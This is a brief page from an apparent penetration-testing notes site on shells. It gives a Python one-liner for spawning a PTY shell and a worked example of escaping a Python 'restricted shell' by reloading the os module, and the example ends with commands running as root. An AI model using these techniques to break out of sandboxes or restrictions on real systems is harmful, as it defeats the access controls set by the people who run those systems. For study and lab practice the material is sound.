Link
n0a110w.github.io

This site uses Just the Docs, a documentation theme for Jekyll.

Search
  1. Shells
    1. one-liner
    2. PTY Backdoors
    3. Escaping Restricted Shells
      1. Example One

Shells

one-liner 

python -c 'import pty; pty.spawn("/bin/sh")'

PTY Backdoors

Escaping Restricted Shells

Example One

  • below is an example of a sys admin overwriting the builtin ‘os’ module in memory to establish a ‘restricted’ shell 
    >>> import sys
>>> sys.modules['os'].system = lambda *x,**y:"STOP HACKING!!!"
>>> sys.modules['os'].popup = lambda *x,**y:"STOP HACKING!!!"
>>> del sys
>>> import os
>>> os.system("ls")
'STOP HACKING!!!'
  • demonstrated below is how to escape the above scenario (reload the os module) 
    >>> import importlib
>>> importlib.reload(os)
module 'os' from '/usr/lib/python3.7/os.py'
>>> os.system("id")
uid=0(root) gid=0(root) groups=0(root) 
0